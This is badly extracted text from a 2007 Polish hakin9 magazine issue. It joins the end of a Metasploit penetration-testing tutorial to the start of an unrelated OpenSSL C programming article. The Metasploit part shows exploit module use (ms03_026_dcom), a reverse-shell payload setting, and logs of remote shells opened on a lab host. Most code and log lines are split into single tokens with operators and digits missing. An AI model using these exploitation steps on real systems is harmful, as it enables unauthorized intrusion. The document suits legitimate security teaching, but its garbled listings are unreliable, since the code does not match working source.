się” - 3 exploity zaowocowały. Ozna-
cza to prawdopodobnie, że maszyna
10.0.0.46  nie  jest  porządnie  zabez-
pieczona.  Pomiędzy  poszczególnymi
połączeniami  można  przełączać  się
za pomocą polecenia  sessions -i X,
gdzie X to ID aktywnego połączenia.

Którą wersję wybrać?

A  więc  jakie  są  różnice  między  wer-
sją 2.X i 3.X? W wersji 2.X oczywi-
ście też można exploitować poszcze-
gólne maszyny, nie można jednak w
tak  prosty  sposób  exploitować  całej
sieci  tak,  jak  zostało  to  opisane  po-
wyżej. Wsparcie dla bazy danych i z
tym związanych poleceń jest zabudo-
wane tylko w wersji 3. Pokażę teraz,
w  jaki sposób postępować przy uży-
waniu wersji 2.X. Najpierw trzeba wy-
brać odpowiedni exploit. Dla orientacji
w  poszczególnych  exploitach  posłu-
ży nam polecenie show exploits, które
wypisze wszystkie możliwe dostępne
exploity (także te własne, o ile jakieś
zostały napisane).

Ze spisu wybierzemy ten wła-

ściwy i za pomocą polecenia use

XXX  (XXX  to  nazwa  exploita)  zo-
stanie  uruchomiony  specjalny  tryb
exploit, w ramach którego ustawimy
możliwości  dla  konkretnego  explo-
ita. Dla przykładu wybraliśmy explo-
it ms03_026_dcom, jego możliwości
są ukazane na Listingu 6.

Listing 4b.

Właściwy proces exploitowania

[*]

Connecting

the

SMB

service

...

[*]

Matched

exploit

windows

dcerpc

ms03_026_dcom

against

10.0

0.46

135

...

[*]

Launching

exploit

windows

dcerpc

ms03

026

_dcom

(

)

against

10.0

0.46

135

...

[*]

Binding

3919286

b10c

ba8

c04fd92ef5

0.0

ncacn_np

10.0

0.46

[

lsarpc

]

...

[*]

Detected

Windows

SP0

SP1

target

[*]

Binding

b324fc8

1670

1278

a47bf6ee188

3.0

ncacn_np

10.0

0.46

[

BROWSER

]

...

[*]

Started

bind

handler

[*]

Trying

target

Windows

SP3

2000

2003

Universal

...

[*]

Binding

d9f4ab8

d1c

861

0020

af6e7c57

0.0

ncacn_ip_tcp

10.0

0.46

[

135

]

...

[*]

Matched

auxiliary

dos

windows

smb

ms06_063_trans

against

10.0

0.46

445

...

[*]

Binding

e67ab081

9844

3521

d32

834

f038001c0

1.0

ncacn_np

10.0

0.46

[

nwwks

]

...

[*]

Bound

d9f4ab8

d1c

861

0020

af6e7c57

0.0

ncacn_ip_tcp

10.0

0.46

[

135

]

...

[*]

Matched

exploit

windows

smb

_049_netapi

against

10.0

0.46

445

...

[*]

Launching

exploit

windows

smb

ms03_049_netapi

(

)

against

10.0

0.46

445

...

[*]

Bound

b324fc8

1670

278

a47bf6ee188

3.0

ncacn_np

10.0

0.46

[

BROWSER

]

...

[*] Started bind handler

[*]

Binding

d9f4e40

a03d

f69

08003

e30051b

1.0

ncacn_np

10.0

0.46

[

browser

]

...

[*]

Bound

3919286

b10c

ba8

c04fd92ef5

0.0

ncacn_np

10.0

0.46

[

lsarpc

]

...

[*]

Building

the

stub

data

...

[*]

Getting

information

...

[*]

Calling

the

vulnerable

function

...

[*]

Matched

exploit

solaris

samba

trans2open

against

10.0

0.46

139

...

[*]

Launching

exploit

solaris

samba

trans2open

(

)

against

10.0

0.46

139

...

[*]

Sending

exploit

...

[*]

Exception

during

launch

from

exploit

solaris

samba

trans2open

target

has

not

been

selected

[*]

Matched

auxiliary

dos

windows

smb

ms06_035_mailslot

against

10.0

0.46

445

...

[*]

Trying

exploit

Windows

5.1

msf

[*]

Command

shell

session

opened

(

10.0

0.2

57153

10.0

0.46

19530

)

[*]

The

DCERPC

service

did

not

our

request

[*]

Command

shell

session

opened

(

10.0

0.2

59665

10.0

0.46

38489

)

[*]

Binding

bffd098

a112

3610

9833

c3f87e345a

1.0

ncacn_np

10.0

0.46

[

BROWSER

]

...

hakin9 Nr 4/2007

www.hakin9.org

Obrona

Zmienne RHOST i RPORT są obo-

wiązkowe i muszą zostać zdefiniowa-
ne. Domyślna wartość RPORT to 135.
A więc wystarczy zdefiniować zmien-
ną  RHOST  i  wybrać  payload,  które-
go  użyjemy.  Podobnie  jak  dla  wypi-
sania możliwości danego exploita, ist-
nieje również polecenie, które wypisze
na ekranie payloady, których możemy
użyć – show payloads. Wybierzemy na
przykład payload  shell_reverse_tc:

set PAYLOAD windows/shell_reverse_tcp

O  ile  wypełniliśmy  wszystkie  obo-
wiązkowe  możliwości  używanego
exploita  (mogą  się  one  różnić),  za
pomocą  polecenia  exploit  możemy
rozpocząć  exploitowanie  danej  ma-
szyny.

Na Rysunku 1. widać, jak exploit

przez nas wybrany, pomyślnie wyko-
rzystał luki w systemie, który podda-
liśmy testowi.

Nasz exploit wykorzystał luki w

systemie i wytworzył TCP połącze-
nie z maszyną 10.0.0.46, przez co

uzyskaliśmy kontrolę nad linią pole-
ceń.

Zakończenie

Nasza praca dobiegła końca. Można
oczywiście  utworzyć  lokalnego  użyt-
kownika, zmienić ustawienia registrów
itp. Naszym celem jednak było wyszu-
kanie  niezałatanych  systemów  w  lo-
kalnej  sieci,  co  udało  nam  się  osią-
gnąć.  Następnym  krokiem  powinno
być  załatanie  wszystkich  wyszuka-
nych luk w systemie.

Do nas należy decyzja, w jaki

sposób  używać  Metasploit,  z  której
wersji  skorzystać;  2  czy  3.  Jednak
przy  użyciu  wsparcia  dla  bazy  da-
nych  w  wersji  3  nasza  praca  stanie
się o wiele prostsza. Metasploit Fra-
mework to znakomite narzędzie, które
pomoże nam przy identyfikacji ryzyk
w zabezpieczeniu naszych sieci i sys-
temów. Jednak jest jeszcze nad czym
popracować,  niełatwo  pisać  własne
exploity – trzeba znać podstawy języ-
ka  programowania  Ruby.  Nie  można
też zapominać o tym, że wersja 3 nie
jest jeszcze wersją stabilną. l

Listing 4c.

Właściwy proces exploitowania

[*]

Unexpected

DCERPC

fault

0x000006f7

[*]

Bound

bffd098

a112

3610

9833

c3f87e345a

1.0

ncacn_

10.0

0.46

[

BROWSER

]

...

[*]

Building

the

stub

data

...

[*]

Calling

the

vulnerable

function

...

[*]

Command

shell

session

opened

(

10.0

0.2

58291

10.0

0.46

38218

)

Listing 5.

Otwarte połączenie uzyskane za pomocą exploitowania

msf

sessions

Active

sessions

===============

Description

Tunnel

-----------

------

Command

shell

10.0

0.2

57153

10.0

0.46

19530

Command

shell

10.0

0.2

59665

10.0

0.46

38489

Command

shell

10.0

0.2

58291

10.0

0.46

38218

Listing 6.

Możliwości ms03_026_dcom

msf

exploit

(

ms03_026_dcom

)

show

options

Module

options

Name

Current

Setting

Required

Description

----

---------------

----

-----------

Proxies

proxy

chain

RHOST

yes

The

target

address

RPORT

135

yes

The

target

port

SSL

Use

SSL

msf

exploit

(

ms03_026_dcom

)

W Sieci

• http://www.metasploit.com/ – strona

domowa projektu Metasploit,

• http://en.wikipedia.org – Wikipedia,
• http://subversion.tigris.org/ – stro-

na domowa projektu Subversion,

• http://www.ruby-lang.org/en – ję-

zyk programowania Ruby.

O autorze

Michal Merta zajmuje się bezpieczeń-
stwem  sieci,  testowaniem  penetracyj-
nym i ocenianiem zabezpieczenia sys-
temów.  Ukończył  informatykę  na  uni-
wersytecie  w  Brnie.  Aktualnie  pracu-
je  dla  międzynarodowej  spółki  w  Pra-
dze  jako  Security  Assessment  and
Compliance  Senior  Consultant.  Inte-
resuje  się  także  systemami  na  bazie
UNIXa,  polityką  bezpieczeństwa  m.in.
ISO27001  i  systemami  detekcji  wła-
mań.  Z  Metasploitem  pracuje  już  pra-
wieże dwa lata. Jego stronę interneto-
wą można znaleźć pod adresem  http:
//www.misuta.cz

www.hakin9.org

hakin9 Nr 4/2007

Obrona

ajbardziej  popularnym  i  skutecznym
rozwiązaniem, zdaje się tu ciągle  oka-
zywać  szyfrowanie  SSL  (ang.  Secure

Socket Layer) względnie rozwijane dalej pod
nazwą TLS (ang. Transport Layer Security) za
pomocą wolnodostępnej biblioteki OpenSSL,
co wykorzystuje większość kluczowych aplika-
cji sieciowych jak Apache, Postfix, OpenSSH.
Pakiet OpenSSL składa się generalnie z trzech
składników:

• biblioteka libssl – obsługuje protokół SSL/

TLS;

• biblioteka libcrypto – zawiera obsługę algo-

rytmów kryptograficznych;

• polecenie openssl – narzędzie administra-

cyjne pozwalające w linii poleceń skorzy-
stać z wymienionych wyżej bibliotek.

Protokół SSL/TLS składa się z trzech faz:

• negocjacja algorytmów;
• wymiana kluczy symetrycznych przy pomo-

cy infrastruktury klucza publicznego (PKI)
i uwierzytelnianiu opartym na certyfikatach;

• szyfrowanie symetryczne za pomocą wcze-

śniej wymienionych kluczy.

W  pierwszej  fazie  klient  i  serwer  wymienia-
ją się informacjami dotyczącymi wersji biblio-
teki  oraz  wspieranych  algorytmów.  W  dru-
giej  fazie  serwer  uwierzytelnia  się  kliento-
wi  przedstawiając  swój  certyfikat  podpisany
przez klucz prywatny. Klient mając już klucz
publiczny  serwera  może  stwierdzić  czy  ma
do czynienia z właściwym serwerem. Opcjo-
nalnie  może  jeszcze  wystąpić  analogiczne
uwierzytelnianie  klienta.  Infrastruktura  klu-
cza publicznego – PKI (ang. Public Key Infra-
structure) to szyfrowanie asymetryczne, któ-
re  jest  dużo  mniej  wydajne  niż  szyfrowanie
symetryczne, dlatego też następnym krokiem
tej  fazy  jest  wymiana  kluczy  symetrycznych
(wygenerowanych na przykład za pomocą al-

Szyfrowanie w aplikacjach

– biblioteka Openssl

Paweł Maziarz

stopień trudności

Informacja w dzisiejszych czasach jest wyjątkowo cenna, dlatego

trzeba o nią odpowiednio zadbać. Sieci firmowe, osiedlowe czy

bezprzewodowe często nie są zabezpieczone na odpowiednim

poziomie (nierzadko nie pozwalają na to przyczyny techniczne),

a więc przy przesyłaniu informacji w sieci, jej nienaruszalność

powinna zagwarantować odpowiednia aplikacja.

Z artykułu dowiesz się...

• jak zaimplementować szyfrowanie

SSL/TLS w swoich aplikacjach

Co powinieneś wiedzieć...

• powinieneś umieć programować w języku C

Biblioteka Openssl

hakin9 Nr 4/2007

www.hakin9.org

gorytmu Diffiego-Hellmana), które
będą używane we właściwym prze-
syłaniu danych. Ostatnia faza to już
faktyczne przesyłanie danych za-
szyfrowanych wcześniej ustalonym
kluczem symetrycznym.

Certyfikaty

Jak  można  wywnioskować  z  po-
przedniego  akapitu,  zanim  stwo-
rzymy  klienta  i  serwer  z  obsługą
szyfrowania  SSL/TLS,  trzeba  naj-
pierw  przygotować  kilka  certyfi-
katów,  z  których  programy  będą
korzystać.  W  naszym  przypadku
będą  potrzebne  dwa  –  certyfikat
Urzędu Certyfikującego (ang. Cer-
tification  Authority  –  CA),  którym
będziemy  podpisywać  certyfikaty
klientów  oraz  certyfikat  dla  same-
go  klienta.  Do  ich  stworzenia  po-
służy komenda

openssl

, By ułatwić

cały proces, stworzymy plik ssl.cnf
(Listing  1),  którego  omawiać  nie
będę,  ponieważ  dostarczony  w
całym  pakiecie  plik  konfiguracyj-
ny  openssl.cnf  zaopatrzony  jest  w
szczegółowe  komentarze.  Musimy
też stworzyć odpowiednią struktu-
rę katalogów i pewne pliki:

drg@catharsis:~$ mkdir -p ssl/
{certs,private}
drg@catharsis:~$ chmod 700 ssl/private/
drg@catharsis:~$ touch ssl/index.txt
drg@catharsis:~$ echo 01 > ssl/serial

po czym można już przystąpić do
generowania certyfikatu głównego
(CA) komendą:

drg@catharsis:~/ssl$ openssl req -x509
-newkey rsa:2048 -out cacert.pem
-outform PEM -config ssl.cnf

Po podaniu i potwierdzeniu hasła do
certyfikatu, zostanie stworzony cer-
tyfikat Urzędu Certyfikującego ca-

cert.pem  oraz  jego  klucz  prywatny
w  private/cakey.pem.  Teraz  trzeba
utworzyć  certyfikat  dla  klienta,  któ-
ry  będzie  używany  w  późniejszych
aplikacjach.  Certyfikat  ten  musi  być
następnie  podpisany  przez  nasze
CA.  Żądanie  certyfikatu  klient  mo-
że utworzyć u siebie po czym wysłać
go do Urzędu Certyfikującego w ce-

Listing 1.

Ssl.cnf - przykładowy plik konfiguracyjny dla openssl

[

]

default_ca

CA_kajmany

[

CA_kajmany

]

dir

certs

dir

certs

new_certs_dir

dir

certs

private_key

dir

private

cakey

pem

serial

dir

serial

database

dir

index

txt

certificate

dir

cacert

pem

default_days

364

default_md

sha1

policy

kajmany_policy

x509_extensions

kajmany_ext

[

kajmany_policy

]

commonName

supplied

countryName

supplied

stateOrProvinceName

supplied

organizationName

supplied

organizationalUnitName

supplied

emailAddress

optional

[

kajmany_ext

]

basicConstraints

false

[

req

]

distinguished_name

kajmany_dn

default_bits

1024

default_keyfile

private

cakey

pem

x509_extensions

kajmany_ca_ext

prompt

[

kajmany_dn

]

commonName

intersim

countryName

stateOrProvinceName

Dolnoslaskie

localityName

Wroclaw

organizationName

Intersim

organizationalUnitName

Centrum

Certyfikatow

emailAddress

pawel

maziarz

intersim

[

kajmany_ca_ext

]

basicConstraints

false

Rysunek 1.

Kompilacja i uruchomienie klienta

hakin9 Nr 4/2007

www.hakin9.org

Obrona

lu podpisania. Ten z kolei po podpi-
saniu odeśle mu już pełnowartościo-
wy certyfikat, Urząd Certyfikujący
może też mieć politykę, tego rodzaju
że sam generuje certyfikaty i od razu
podpisuje je dla klientów, tak będzie
to wyglądało w naszym przykładzie.
Żądanie certyfikatu:

drg@catharsis:~/ssl$ openssl req -
newkey rsa:2048 -keyout clients/cert-
server-key.pem -keyform PEM -out
clients/cert-server-request.pem -
outform PEM

i jego podpisanie:

drg@catharsis:~/ssl$ openssl ca -
in clients/cert-server-request.pem
-notext -out clients/cert-server.pem
-config ssl.cnf

Wypada jeszcze wygenerować dla
serwera plik z parametrami dla algoryt-
mu Diffiego-Hellmana poleceniem:

drg@catharsis:~ssl$ openssl dhparam
-out clients/dhserver.pem 512

Po tych czynnościach w katalogu

clients/ znajduje się gotowy certyfi-
kat do wykorzystania w aplikacji cert-

server.pem, klucz prywatny do niego

cert-key.pem oraz plik dhserver.pem
z parametrami DH. Plik cert-server-

request.pem nie jest już potrzebny,
należy go zatem usunąć. Informacje
o stworzonych certyfikatach może-
my wyświetlić komendami:

drg@catharsis:~/ssl$ openssl req -
noout -text -in clients/cert-server-
request.pem
drg@catharsis:~/ssl$ openssl x509 -

noout -text -in clients/cert-server.pem
drg@catharsis:~/ssl$ openssl x509 -
noout -text -in cacert.pem

Budujemy klienta ssl

Na pierwszy ogień pójdzie aplika-
cja  klienta,  która  zestawia  szyfro-
wane połączenie z serwerem, wy-
syła  zapytanie  HTTP  (by  od  razu
można  było  przeprowadzić  testy
na  realnych  serwerach  WWW  z
obsługą  połączeń  SSL/TLS)  oraz
wyświetla  informacje  o  certyfika-
cie  drugiej  strony  i  odczytuje  od-
powiedź.

Na samym początku aplikacja

openssl  powinna  zainicjować  do-
stępne  algorytmy,  szyfry  oraz  na-
zwy  błędów,  które  w  razie  proble-
mów  będą  bardziej  pomocne  niż
ich  liczbowe  wartości,  wywołując
funkcje:

Listing 2.

Funkcja ssl_client_initialize_ctx z pliku ssl-client.c

SSL_CTX

ssl_client_initialize_ctx

()

{

SSL_CTX

ctx

;

SSL_METHOD

method

;

SSL_library_init

();

OpenSSL_add_all_algorithms

();

SSL_load_error_strings

();

ERR_load_crypto_strings

();

method

SSLv23_client_method

();

ctx

SSL_CTX_new

(

method

);

SSL_CTX_load_verify_locations

(

ctx

CA_FILE

NULL

)

SSL_CTX_set_default_verify_paths

(

ctx

))

{

fprintf

(

stderr

"Błąd w ładowaniu certyfikatu CA, nie zweryfikuję zatem

certyfikatu serwera.

);

ERR_print_errors_fp

(

stderr

);

}

SSL_CTX_set_verify

(

ctx

SSL_VERIFY_NONE

NULL

);

SSL_CTX_set_verify_depth

(

ctx

);

SSL_CTX_set_options

(

ctx

SSL_OP_ALL

SSL_OP_NO_SSLv2

);

return

ctx

;

}

Listing 3.

bioex.c – przykład łańcucha BIO

#include

#include

int

main

()

{

BIO

bio

b64

;

char

message

[]

"Bio przyklad"

;

bio

BIO_new

(

BIO_s_file

());

BIO_set_fp

(

bio

stdout

BIO_NOCLOSE

);

b64

BIO_new

(

BIO_f_base64

());

bio

BIO_push

(

b64

bio

);

BIO_write

(

bio

message

strlen

(

message

));

BIO_flush

(

bio

);

BIO_free_all

(

bio

);

return

;

}

Rysunek 2.

Kompilacja i działanie serwera

Biblioteka Openssl

hakin9 Nr 4/2007

www.hakin9.org

SSL_library_init();
OpenSSL_add_all_algorithms();
SSL_load_error_strings();
ERR_load_crypto_strings();

Następnie  trzeba  określić  jakimi
protokołami  aplikacja  będzie  się
porozumiewać oraz jaką rolę w tej
komunikacji będzie spełniać – ser-
wera,  klienta  czy  też  może  obie.
Określa się to poprzez zainicjowa-
nie  struktury  typu  SSL_METHOD

*method odpowiednią funkcją, któ-
rej pierwszym członem jest typ pro-
tokołu, jeden z poniższych:

• SSLv2 – SSL w wersji 2, nieza-

lecane z powodu poważnych luk
bezpieczeństwa;

•   SSLv3 – SSL w wersji 3;
•   TLSv1 – TLS w wersji 1.0;
•   SSLv23 – SSL w wersji 2, 3 lub

TLS w wersji 1.0

• DTLSv1 – DTLS w wersji 1.0

(szyfrowanie datagramów pakie-
tów, np. UDP).

Jeżeli chodzi o kompatybilność, to
widać, że najlepszym wyborem bę-
dzie  SSLv23,  jednak  druga  stro-
na  łatwo  może  jednak  wymusić
protokół  SSL  2,  co  narazi  na  nie-
bezpieczeństwo  nasz  programo-
wany  system.  Można  sobie  jed-
nak z tym poradzić w późniejszym
czasie  poprzez  przekazanie  jed-
nej  z  opcji  SSL_OP_NO_SSLv2,
SSL_OP_NO_SSLv3  albo  SSL_
OP_NO_TLSv1 do konkretnego po-
łączenia lub całego kontekstu SSL,
która wyłączy obsługę konkretnego
protokołu. Następnym członem jest
rola – client, server albo jej brak, je-
żeli aplikacja ma pracować zarówno
jako klient i serwer. Dla klienta TLS
inicjalizacja  struktury  method  bę-
dzie więc miała postać

SSL _ METHOD

*method = TLSv1 _ client _ method()

dla serwera

SSL _ METHOD *method

= TLSv1 _ server _ method()

, a dla

aplikacji hybrydowej

SSL _ METHOD

*method = TLSv1 _ method()

Po wyborze metody czas na za-

inicjowanie całego kontekstu SSL
(struktura

SSL _ CTX *ctx

). Kontekst

ten musi być całkowicie przygoto-
wany przed otwarciem pierwsze-

go połączenia. Każde nowe połą-
czenie w aplikacji będzie odnosiło
się do tego jednego kontekstu, na-

leży więc pamiętać o tym, że zmie-
niając właściwości kontekstu, np.

SSL _ CTX _ set _ options(ctx, SSL _

Listing 4.

główna funkcja z pliku ssl-client.c

define

HOSTPORT

"localhost:4433"

define

CA_FILE

"/home/drg/ssl/cacert.pem"

define

REQUEST

"HEAD / HTTP/1.0

\r\n\r\n

void

certificate_print_info

(

SSL

ssl

);

SSL_CTX

ssl_client_initialize_ctx

();

int

main

(

int

argc

char

argv

)

{

char

host_port

;

BIO

sbio

;

SSL_CTX

ctx

;

SSL

ssl

;

char

buf

[

1024

];

int

len

;

long

int

err

;

(

argc

)

host_port

strdup

(

argv

[

]);

else

host_port

strdup

(

HOSTPORT

);

ctx

ssl_client_initialize_ctx

();

sbio

BIO_new_ssl_connect

(

ctx

);

BIO_set_conn_hostname

(

sbio

host_port

);

BIO_get_ssl

(

sbio

ssl

);

ssl

)

{

fprintf

(

stderr

"Błąd ssl.

);

ERR_print_errors_fp

(

stderr

);

return

;

}

SSL_set_mode

(

ssl

SSL_MODE_AUTO_RETRY

);

(

BIO_do_connect

(

sbio

)

{

fprintf

(

stderr

"Błąd łączenia

z serwerem %s

host_port

);

ERR_print_errors_fp

(

stderr

);

return

;

}

((

err

SSL_get_verify_result

(

ssl

))

X509_V_OK

)

{

fprintf

(

stderr

"Błąd przy weryfikacji

certyfikatu (kod %ld - %s).

err

X509_verify_cert_error_string

(

err

));

ERR_print_errors_fp

(

stderr

);

}

else

fprintf

(

stderr

"Certyfikat poprawnie zweryfikowany.

);

certificate_print_info

(

ssl

);

(

BIO_do_handshake

(

sbio

)

{

fprintf

(

stderr

"Error establishing SSL connection

);

ERR_print_errors_fp

(

stderr

);

return

;

}

BIO_puts

(

sbio

REQUEST

);

while

(

)

{

len

BIO_read

(

sbio

buf

1024

);

(

len

)

break

;

write

(

STDOUT_FILENO

buf

len

);

}

BIO_free_all

(

sbio

);

exit

(

);

}

hakin9 Nr 4/2007

www.hakin9.org

Obrona

OP _ ALL | SSL _ OP _ NO _ SSLv2),

zmiana  będzie  dotyczyć  wszyst-
kich  połączeń,  podczas  gdy  usta-
wienie  tych  opcji  tylko  dla  jedne-
go konkretnego połączenia miałoby
postać

SSL _ set _ options(sslcon,

SSL _ OP _ ALL | SSL _ OP _ NO _ SSLv2)

Za inicjalizację kontekstu odpowie-
dzialne jest wywołanie SSL_CTX
*

ctx = SSL _ CTX _ new(method)

, gdzie

method

zostało już wcześniej omó-

wione. W bardziej zwartej wersji
można to oczywiście zapisać

ctx

SSL _ CTX _ new(SSLv23 _ client _

method())

(w przypadku klienta).

Prawie  wszystko  zostało  już  dla
klienta  przygotowane  jednak  w
celu  weryfikacji  certyfikatów  ser-
werów,  z  którymi  klient  będzie
się  łączył,  należy  jeszcze  załado-
wać  certyfikat  Urzędu  Certyfiku-

jącego (CA). Zrobimy to używając
funkcji

SSL _ CTX _ load _ verify _

locations()

oraz

SSL _ CTX _ set _

default _ verify _ paths()

. Przyda

się też określić parametry weryfi-
kacji; służy do tego funkcja

SSL _

CTX _ set _ verify()

. Pierwszym pa-

rametrem jest oczywiście wskaźnik
na kontekst (widać to po przedrost-
ku SSL_CTX_), następnym zaś fla-
ga określająca zasady weryfikacji.
Dostępne dla klienta flagi to:

• SSL_VERIFY_NONE-certyfikat

przesłany  od  serwera  zostanie
sprawdzony,  jednak  niezależnie
od  wyniku,  połączenie  będzie
kontynuowane; wynik weryfikacji
można później sprawdzić za po-
mocą  funkcji

SSL _ get _ verify _

result()

;

• SSL_VERIFY_PEER – jeżeli we-

ryfikacja certyfikatu serwera nie
powiedzie się połączenie jest na-
tychmiastowo zatrzymywane z
informacją o błędzie.

Trzecim  i  ostatnim  argumentem
tej funkcji jest wskaźnik na własną
funkcję weryfikującą, z której moż-
na  jednak  zrezygnować  podając
jako  argument  NULL,  co  poczyni-
my  w  naszym  kliencie.  Przy  usta-
wianiu parametrów weryfikacji mo-
żemy  ustawić  jeszcze  limit  głębo-
kości  sprawdzanych  certyfikatów
(domyślnie jest 9) za pomocą funk-
cji

SSL _ CTX _ set _ verify _ depth()

Ustawienie głębokości na 1 spo-
woduje, że sprawdzony będzie tyl-
ko certyfikat serwera (Urzędu Cer-
tyfikującego już nie), co w naszym
przypadku zupełnie wystarczy.

Opisane czynności inicjujące

umieściliśmy w naszym kliencie
w osobnej funkcji

ssl _ client _

initialize _ ctx()

przedstawionej na

Listingu 2.

Basic Input/Output

BIO  to  abstrakcja  wejścia/wyjścia
dostępna dla programisty openssl.
Dzięki  BIO  aplikacja  może  scho-
wać  wszystkie  niskopoziomowe
wywołania  związane  z  obsługą
połączenia SSL, z obsługą nieszy-
frowanego  połączenia  TCP/IP  czy
też  z  obsługą  plików.  Istnieją  dwa
rodzaje BIO

• source/sink BIO
• filter BIO

Listing 5.

Funkcja certificate_print_info z ssl_client.c

void

certificate_print_info

(

SSL

ssl

)

{

X509

cert

;

char

commonName

[

128

];

char

country

[

128

];

char

state

[

128

];

char

locality

[

128

];

char

org

[

128

];

char

unit

[

128

];

commonName

country

state

locality

org

unit

;

cert

SSL_get_peer_certificate

(

ssl

);

X509_NAME_get_text_by_NID

(

X509_get_subject_name

(

cert

)

NID_countryName

country

128

);

X509_NAME_get_text_by_NID

(

X509_get_subject_name

(

cert

)

NID_

stateOrProvinceName

state

128

);

X509_NAME_get_text_by_NID

(

X509_get_subject_name

(

cert

)

NID_localityName

locality

128

);

X509_NAME_get_text_by_NID

(

X509_get_subject_name

(

cert

)

NID_organizationName

org

128

);

X509_NAME_get_text_by_NID

(

X509_get_subject_name

(

cert

)

NID_commonName

commonName

128

);

X509_NAME_get_text_by_NID

(

X509_get_subject_name

(

cert

)

NID_

organizationalUnitName

unit

128

);

X509_free

(

cert

);

fprintf

(

stderr

);

fprintf

(

stderr

"country: %s

country

);

fprintf

(

stderr

"state: %s

state

);

fprintf

(

stderr

"org: %s

org

);

fprintf

(

stderr

"commonName: %s

commonName

);

fprintf

(

stderr

"unit: %s

unit

);

fprintf

(

stderr

"locality: %s

locality

);

fprintf

(

stderr

);

}

O autorze

Autor jest właścicielem i jednocześnie
jednym  z  głównych  programistów
firmy  tworzącej  między  innymi  sie-
ciowe oprogramowanie. Na przełomie
ostatnich  lat  współpracował  z  kilko-
ma  firmami  w  charakterze  Security
Specialist.  W  wolnych  chwilach  gra
w  golfa,  na  gitarze  klasycznej  oraz
spuszcza  się  na  linie  z  budynków.
Kontakt z autorem:
pawel.maziarz@intersim.pl.

Biblioteka Openssl

hakin9 Nr 4/2007

www.hakin9.org

Pierwsze  z  nich  służą  do  bezpo-
średniego  operowania  na  gniaz-
dach czy plikach. Drugie – filtrują-
ce  –  pobierają  dane  z  innych  BIO
i  przekazują  je  do  kolejnych,  lub
wprost  do  aplikacji.  Dane  te  mogą
zostać niezmienione (np. BIO bufo-
rujące) bądź odpowiednio przetwo-
rzone (np. BIO szyfrujące). Cieka-
wostką  jest fakt, że BIO mogą być
łączone  w  łańcuchy  (pojedyncze
BIO  to  łańcuch  z  jednym  elemen-
tem) za pomocą funkcji

BIO _ push()

(intuicyjnie

BIO _ pop()

zdejmu-

je  BIO  z  łańcucha),  dzięki  cze-
mu  w  łatwy  i  praktycznie  przezro-
czysty  sposób  można  dokonywać
operacji  na  danych.  Do  tworze-
nia abstrakcyjnych BIO służy funk-
cja

BIO _ new(),

przyjmująca jako

parametr  rodzaj  tworzonego  BIO
(dostępne  rodzaje  można  znaleźć
na  stronie  podręcznika  man  bio).
Szybka

demonstracja

łańcu-

chów BIO przedstawiona jest na
Listingu 3.

Program ten tworzy nowe BIO

plikowe (jest to BIO typu source/
sink), po czym przypisuje do niego
standardowe wyjście:

bio = BIO_new(BIO_s_file());
BIO_set_fp(bio, stdout,

BIO_NOCLOSE);

i tutaj mała uwaga – studiując stronę
podręcznika man BIO_s_file można
zauważyć, że zamiast tych dwóch
linijek można użyć funkcji

BIO _ new _

fp()

, która zrobi dokładnie to samo,

a więc prościej:

bio = BIO_new_fp(stdout, BIO_NOCLOSE);

W  następnych  linijkach  program
tworzy  nowe  BIO,  tym  razem  fil-
trujące,  typu

BIO _ f _ base64()

Jest  to  BIO,  które  koduje  wszyst-
ko co jest do niego zapisane algo-
rytmem  base64  oraz  dekoduje  w
przypadku  odczytu  z  niego.  Funk-
cja

BIO _ push(b64, bio)

dołącza do

łańcucha złożonego do tej pory z
BIO plikowego typu source/sink,
BIO filtrujące b64 i zwraca łańcuch
bio. Od tej pory wszystko to, co zo-
stanie zapisane do bio, będzie naj-

pierw zamienione na ciąg base64,
a następnie wyświetlone na stan-
dardowe wyjście.

Najszybszym sposobem na po-

łączenie  się  ze  zdalnym  serwerem
SLL/TLS  jest  więc  stworzenie  łań-
cucha  BIO  składającego  się  z  BIO
typu

BIO _ s _ connect()

(BIO ty-

pu source/sink) oraz z BIO filtrują-
cego typu

BIO _ f _ ssl()

. Przeglą-

dając dokumentację (polecam man

bio jako bazę) znajdziemy funk-
cję

BIO _ new _ ssl _ connect()

, któ-

ra zwróci nam właśnie taki łańcuch.
Adres hosta i port ustalimy funkcją

BIO _ set _ conn _ hostname()

– widać

od razu jak przyjemnie pracuje się
z BIO – nie musimy się nawet mar-
twić o obsługę gniazd na niskim po-
ziomie (co jest jedną ze szkół pisa-

Listing 6.

Funkcja server_ssl_initialize_ctx z pliku ssl-server.c

SSL_CTX

server_ssl_initialize_ctx

()

{

SSL_CTX

ctx

;

BIO

dhbio

;

SSL_library_init

();

SSL_load_error_strings

();

ERR_load_crypto_strings

();

OpenSSL_add_all_algorithms

();

ctx

SSL_CTX_new

(

SSLv23_server_method

());

(

SSL_CTX_use_certificate_file

(

ctx

CERTIFICATE_FILE

SSL_FILETYPE_PEM

)

{

fprintf

(

stderr

"Błąd wczytywania certyfikatu.

);

ERR_print_errors_fp

(

stderr

);

return

NULL

;

}

(

SSL_CTX_use_PrivateKey_file

(

ctx

PRIVATE_KEY

SSL_FILETYPE_PEM

)

{

fprintf

(

stderr

"Błąd wczytywania klucza prywatnego.

);

ERR_print_errors_fp

(

stderr

);

return

NULL

;

}

(

SSL_CTX_check_private_key

(

ctx

)

{

fprintf

(

stderr

"Klucz prywatny zdaje się nie należeć do certyfikatu.

);

ERR_print_errors_fp

(

stderr

);

return

NULL

;

}

((

dhbio

BIO_new_file

(

DH_FILE

"r"

))

NULL

)

{

fprintf

(

stderr

"Błąd we wczytywaniu parametrów DH. Pomijamy ten krok.

);

ERR_print_errors_fp

(

stderr

);

}

else

{

PEM_read_bio_DHparams

(

dhbio

NULL

);

BIO_free

(

dhbio

);

(

SSL_CTX_set_tmp_dh

(

ctx

)

{

fprintf

(

stderr

"Błąd w ustawianiu paremetrów DH. Pomijamy.

);

ERR_print_errors_fp

(

stderr

);

}
}

Listing 7.

Funkcja z pliku ssl-server.c obsługująca sygnał SIGCHLD

void

sigchild_handler

(

int

sig

)

{

int

status

;

pid_t

pid

;

pid

wait

status

);

(

WIFEXITED

(

status

))

fprintf

(

stderr

"Proces

%d wrocil z
kodem %d.

pid

WEXITSTATUS

(

status

));

else

(

WIFSIGNALED

(

status

))

fprintf

(

stderr

"Proces %d został

zabity sygnałem %d.

pid

WTERMSIG

(

status

));

}

hakin9 Nr 4/2007

www.hakin9.org

Obrona

nia aplikacji z openssl). W celu uzy-
skania  dostępu  do  wskaźnika  na
połączenie  SSL,  znajdującego  się
w  naszym  łańcuchu  BIO,  używa-
my funkcji

BIO _ get _ ssl()

, co widać

na Listingu 4, zawierającym główną
